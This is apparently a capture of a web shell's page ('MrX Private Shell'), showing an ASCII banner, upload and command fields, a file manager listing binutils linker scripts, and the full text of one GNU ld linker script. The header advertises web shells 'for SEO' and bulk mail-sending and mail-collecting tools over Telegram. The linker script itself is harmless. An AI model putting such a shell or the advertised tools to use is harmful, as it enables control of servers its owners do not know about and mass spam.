__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* Script for -Ur */
/* Copyright (C) 2014-2025 Free Software Foundation, Inc.
   Copying and distribution of this script, with or without modification,
   are permitted in any medium without royalty provided the copyright
   notice and this notice are preserved.  */
OUTPUT_FORMAT(pe-x86-64)
SEARCH_DIR("=/usr/local/lib/x86_64-linux-gnu"); SEARCH_DIR("=/lib/x86_64-linux-gnu"); SEARCH_DIR("=/usr/lib/x86_64-linux-gnu"); SEARCH_DIR("=/usr/local/lib"); SEARCH_DIR("=/lib"); SEARCH_DIR("=/usr/lib"); SEARCH_DIR("=/usr/x86_64-pep/lib");
SECTIONS
{
  .text  :
  {
    *(.text)
    . = ALIGN(8);
  }
  /* The Cygwin32 library uses a section to avoid copying certain data
     on fork.  This used to be named ".data".  The linker used
     to include this between __data_start__ and __data_end__, but that
     breaks building the cygwin32 dll.  Instead, we name the section
     ".data_cygwin_nocopy" and explicitly include it after __data_end__. */
  .data  :
  {
    *(.data)
    KEEP(*(.jcr))
  }
  .rdata  :
  {
    *(.rdata)
    . = ALIGN(4);
    /* .ctors & .dtors */
    . = ALIGN(8);
       /* Note: we always define __CTOR_LIST__ and ___CTOR_LIST__ here,
          we do not PROVIDE them.  This is because the ctors.o startup
	  code in libgcc defines them as common symbols, with the
          expectation that they will be overridden by the definitions
	  here.  If we PROVIDE the symbols then they will not be
	  overridden and global constructors will not be run.
	  See PR 22762 for more details.

	  This does mean that it is not possible for a user to define
	  their own __CTOR_LIST__ and __DTOR_LIST__ symbols; if they do,
	  the content from those variables are included but the symbols
	  defined here silently take precedence.  If they truly need to
	  be redefined, a custom linker script will have to be used.
	  (The custom script can just be a copy of this script with the
	  PROVIDE() qualifiers added).
	  In particular this means that ld -Ur does not work, because
	  the proper __CTOR_LIST__ set by ld -Ur is overridden by a
	  bogus __CTOR_LIST__ set by the final link.  See PR 46.  */
       ___CTOR_LIST__ = .;
       __CTOR_LIST__ = .;
       LONG (-1); LONG (-1);
       KEEP (*(.ctors));
       KEEP (*(.ctor));
       KEEP (*(SORT_BY_NAME(.ctors.*)));
       LONG (0); LONG (0);
       /* See comment about __CTOR_LIST__ above.  The same reasoning
    	  applies here too.  */
       ___DTOR_LIST__ = .;
       __DTOR_LIST__ = .;
       LONG (-1); LONG (-1);
       KEEP (*(.dtors));
       KEEP (*(.dtor));
       KEEP (*(SORT_BY_NAME(.dtors.*)));
       LONG (0); LONG (0);
    /* .CRT */
    /* ___crt_xl_end__ is defined in the TLS Directory support code */
  }
  .eh_frame  :
  {
    KEEP (*(.eh_frame))
  }
  .pdata  :
  {
    KEEP(*(.pdata))
  }
  .xdata  :
  {
    KEEP(*(.xdata))
  }
  .bss  :
  {
    *(.bss)
    *(COMMON)
  }
  .edata  :
  {
    *(.edata)
  }
  /DISCARD/ :
  {
    *(.debug$S)
    *(.debug$T)
    *(.debug$F)
  }
  .idata  :
  {
    /* This cannot currently be handled with grouped sections.
	See pep.em:sort_sections.  */
  }
  /* Windows TLS expects .tls$AAA to be at the start and .tls$ZZZ to be
     at the end of the .tls section.  This is important because _tls_start MUST
     be at the beginning of the section to enable SECREL32 relocations with TLS
     data.  */
  .tls  :
  {
    *(.tls)
  }
  .endjunk  :
  {
    /* end is deprecated, don't use it */
  }
  .rsrc  : SUBALIGN(4)
  {
    *(.rsrc)
  }
  .reloc  :
  {
    *(.reloc)
  }
  .stab   :
  {
    *(.stab)
  }
  .stabstr   :
  {
    *(.stabstr)
  }
  /* DWARF debug sections.
     Symbols in the DWARF debugging sections are relative to the beginning
     of the section.  Unlike other targets that fake this by putting the
     section VMA at 0, the PE format will not allow it.  */
  /* DWARF 1.1 and DWARF 2.  */
  .debug_aranges   :
  {
    *(.debug_aranges)
  }
  .zdebug_aranges   :
  {
    *(.zdebug_aranges)
  }
  .debug_pubnames   :
  {
    *(.debug_pubnames)
  }
  .zdebug_pubnames   :
  {
    *(.zdebug_pubnames)
  }
  /* DWARF 2.  */
  .debug_info   :
  {
    *(.debug_info)
  }
  .zdebug_info   :
  {
    *(.zdebug_info)
  }
  .debug_abbrev   :
  {
    *(.debug_abbrev)
  }
  .zdebug_abbrev   :
  {
    *(.zdebug_abbrev)
  }
  .debug_line   :
  {
    *(.debug_line)
  }
  .zdebug_line   :
  {
    *(.zdebug_line)
  }
  .debug_frame   :
  {
    *(.debug_frame*)
  }
  .zdebug_frame   :
  {
    *(.zdebug_frame*)
  }
  .debug_str   :
  {
    *(.debug_str)
  }
  .zdebug_str   :
  {
    *(.zdebug_str)
  }
  .debug_loc   :
  {
    *(.debug_loc)
  }
  .zdebug_loc   :
  {
    *(.zdebug_loc)
  }
  .debug_macinfo   :
  {
    *(.debug_macinfo)
  }
  .zdebug_macinfo   :
  {
    *(.zdebug_macinfo)
  }
  /* SGI/MIPS DWARF 2 extensions.  */
  .debug_weaknames   :
  {
    *(.debug_weaknames)
  }
  .zdebug_weaknames   :
  {
    *(.zdebug_weaknames)
  }
  .debug_funcnames   :
  {
    *(.debug_funcnames)
  }
  .zdebug_funcnames   :
  {
    *(.zdebug_funcnames)
  }
  .debug_typenames   :
  {
    *(.debug_typenames)
  }
  .zdebug_typenames   :
  {
    *(.zdebug_typenames)
  }
  .debug_varnames   :
  {
    *(.debug_varnames)
  }
  .zdebug_varnames   :
  {
    *(.zdebug_varnames)
  }
  /* DWARF 3.  */
  .debug_pubtypes   :
  {
    *(.debug_pubtypes)
  }
  .zdebug_pubtypes   :
  {
    *(.zdebug_pubtypes)
  }
  .debug_ranges   :
  {
    *(.debug_ranges)
  }
  .zdebug_ranges   :
  {
    *(.zdebug_ranges)
  }
  /* DWARF 4.  */
  .debug_types   :
  {
    *(.debug_types)
  }
  .zdebug_types   :
  {
    *(.zdebug_types)
  }
  /* DWARF 5.  */
  .debug_addr   :
  {
    *(.debug_addr)
  }
  .zdebug_addr   :
  {
    *(.zdebug_addr)
  }
  .debug_line_str   :
  {
    *(.debug_line_str)
  }
  .zdebug_line_str   :
  {
    *(.zdebug_line_str)
  }
  .debug_loclists   :
  {
    *(.debug_loclists)
  }
  .zdebug_loclists   :
  {
    *(.zdebug_loclists)
  }
  .debug_macro   :
  {
    *(.debug_macro)
  }
  .zdebug_macro   :
  {
    *(.zdebug_macro)
  }
  .debug_names   :
  {
    *(.debug_names)
  }
  .zdebug_names   :
  {
    *(.zdebug_names)
  }
  .debug_rnglists   :
  {
    *(.debug_rnglists)
  }
  .zdebug_rnglists   :
  {
    *(.zdebug_rnglists)
  }
  .debug_str_offsets   :
  {
    *(.debug_str_offsets)
  }
  .zdebug_str_offsets   :
  {
    *(.zdebug_str_offsets)
  }
  .debug_sup   :
  {
    *(.debug_sup)
  }
  /* For Go and Rust.  */
  .debug_gdb_scripts   :
  {
    *(.debug_gdb_scripts)
  }
  .zdebug_gdb_scripts   :
  {
    *(.zdebug_gdb_scripts)
  }
}

Filemanager

Name Type Size Permission Actions
elf32_x86_64.x File 10.99 KB 0644
elf32_x86_64.xbn File 10.8 KB 0644
elf32_x86_64.xc File 10.65 KB 0644
elf32_x86_64.xce File 10.98 KB 0644
elf32_x86_64.xcer File 10.93 KB 0644
elf32_x86_64.xd File 10.86 KB 0644
elf32_x86_64.xdc File 10.55 KB 0644
elf32_x86_64.xdce File 10.89 KB 0644
elf32_x86_64.xdcer File 10.83 KB 0644
elf32_x86_64.xde File 11.2 KB 0644
elf32_x86_64.xder File 11.14 KB 0644
elf32_x86_64.xdw File 10.51 KB 0644
elf32_x86_64.xdwe File 10.85 KB 0644
elf32_x86_64.xdwer File 10.79 KB 0644
elf32_x86_64.xe File 11.29 KB 0644
elf32_x86_64.xer File 11.24 KB 0644
elf32_x86_64.xn File 10.96 KB 0644
elf32_x86_64.xr File 6.5 KB 0644
elf32_x86_64.xs File 10.49 KB 0644
elf32_x86_64.xsc File 10.18 KB 0644
elf32_x86_64.xsce File 10.52 KB 0644
elf32_x86_64.xscer File 10.46 KB 0644
elf32_x86_64.xse File 10.83 KB 0644
elf32_x86_64.xser File 10.77 KB 0644
elf32_x86_64.xsw File 10.14 KB 0644
elf32_x86_64.xswe File 10.48 KB 0644
elf32_x86_64.xswer File 10.42 KB 0644
elf32_x86_64.xu File 6.52 KB 0644
elf32_x86_64.xw File 10.61 KB 0644
elf32_x86_64.xwe File 10.95 KB 0644
elf32_x86_64.xwer File 10.89 KB 0644
elf_i386.x File 10.27 KB 0644
elf_i386.xbn File 10.07 KB 0644
elf_i386.xc File 10.05 KB 0644
elf_i386.xce File 10.39 KB 0644
elf_i386.xcer File 10.33 KB 0644
elf_i386.xd File 10.13 KB 0644
elf_i386.xdc File 9.95 KB 0644
elf_i386.xdce File 10.29 KB 0644
elf_i386.xdcer File 10.23 KB 0644
elf_i386.xde File 10.47 KB 0644
elf_i386.xder File 10.41 KB 0644
elf_i386.xdw File 9.91 KB 0644
elf_i386.xdwe File 10.25 KB 0644
elf_i386.xdwer File 10.2 KB 0644
elf_i386.xe File 10.57 KB 0644
elf_i386.xer File 10.51 KB 0644
elf_i386.xn File 10.23 KB 0644
elf_i386.xr File 6.24 KB 0644
elf_i386.xs File 9.76 KB 0644
elf_i386.xsc File 9.58 KB 0644
elf_i386.xsce File 9.92 KB 0644
elf_i386.xscer File 9.86 KB 0644
elf_i386.xse File 10.1 KB 0644
elf_i386.xser File 10.04 KB 0644
elf_i386.xsw File 9.54 KB 0644
elf_i386.xswe File 9.88 KB 0644
elf_i386.xswer File 9.82 KB 0644
elf_i386.xu File 6.26 KB 0644
elf_i386.xw File 10.01 KB 0644
elf_i386.xwe File 10.35 KB 0644
elf_i386.xwer File 10.29 KB 0644
elf_iamcu.x File 9.96 KB 0644
elf_iamcu.xbn File 9.77 KB 0644
elf_iamcu.xc File 9.75 KB 0644
elf_iamcu.xce File 10.09 KB 0644
elf_iamcu.xcer File 10.03 KB 0644
elf_iamcu.xd File 9.83 KB 0644
elf_iamcu.xdc File 9.65 KB 0644
elf_iamcu.xdce File 9.99 KB 0644
elf_iamcu.xdcer File 9.93 KB 0644
elf_iamcu.xde File 10.17 KB 0644
elf_iamcu.xder File 10.11 KB 0644
elf_iamcu.xdw File 9.61 KB 0644
elf_iamcu.xdwe File 9.95 KB 0644
elf_iamcu.xdwer File 9.89 KB 0644
elf_iamcu.xe File 10.27 KB 0644
elf_iamcu.xer File 10.21 KB 0644
elf_iamcu.xn File 9.93 KB 0644
elf_iamcu.xr File 6.18 KB 0644
elf_iamcu.xs File 9.46 KB 0644
elf_iamcu.xsc File 9.28 KB 0644
elf_iamcu.xsce File 9.62 KB 0644
elf_iamcu.xscer File 9.56 KB 0644
elf_iamcu.xse File 9.8 KB 0644
elf_iamcu.xser File 9.74 KB 0644
elf_iamcu.xsw File 9.24 KB 0644
elf_iamcu.xswe File 9.58 KB 0644
elf_iamcu.xswer File 9.52 KB 0644
elf_iamcu.xu File 6.2 KB 0644
elf_iamcu.xw File 9.71 KB 0644
elf_iamcu.xwe File 10.05 KB 0644
elf_iamcu.xwer File 9.99 KB 0644
elf_x86_64.x File 10.86 KB 0644
elf_x86_64.xbn File 10.67 KB 0644
elf_x86_64.xc File 10.52 KB 0644
elf_x86_64.xce File 10.85 KB 0644
elf_x86_64.xcer File 10.8 KB 0644
elf_x86_64.xd File 10.73 KB 0644
elf_x86_64.xdc File 10.42 KB 0644
elf_x86_64.xdce File 10.76 KB 0644
elf_x86_64.xdcer File 10.7 KB 0644
elf_x86_64.xde File 11.07 KB 0644
elf_x86_64.xder File 11.01 KB 0644
elf_x86_64.xdw File 10.38 KB 0644
elf_x86_64.xdwe File 10.72 KB 0644
elf_x86_64.xdwer File 10.66 KB 0644
elf_x86_64.xe File 11.17 KB 0644
elf_x86_64.xer File 11.11 KB 0644
elf_x86_64.xn File 10.83 KB 0644
elf_x86_64.xr File 6.5 KB 0644
elf_x86_64.xs File 10.36 KB 0644
elf_x86_64.xsc File 10.05 KB 0644
elf_x86_64.xsce File 10.39 KB 0644
elf_x86_64.xscer File 10.33 KB 0644
elf_x86_64.xse File 10.7 KB 0644
elf_x86_64.xser File 10.64 KB 0644
elf_x86_64.xsw File 10.01 KB 0644
elf_x86_64.xswe File 10.35 KB 0644
elf_x86_64.xswer File 10.29 KB 0644
elf_x86_64.xu File 6.52 KB 0644
elf_x86_64.xw File 10.48 KB 0644
elf_x86_64.xwe File 10.82 KB 0644
elf_x86_64.xwer File 10.76 KB 0644
i386pe.x File 10.49 KB 0644
i386pe.xa File 10.47 KB 0644
i386pe.xbn File 10.46 KB 0644
i386pe.xe File 10.47 KB 0644
i386pe.xer File 10.48 KB 0644
i386pe.xn File 10.46 KB 0644
i386pe.xr File 4.57 KB 0644
i386pe.xu File 6.01 KB 0644
i386pep.x File 10.83 KB 0644
i386pep.xa File 10.82 KB 0644
i386pep.xbn File 10.8 KB 0644
i386pep.xe File 10.81 KB 0644
i386pep.xer File 10.83 KB 0644
i386pep.xn File 10.8 KB 0644
i386pep.xr File 4.82 KB 0644
i386pep.xu File 6.34 KB 0644
stamp File 0 B 0644
Filemanager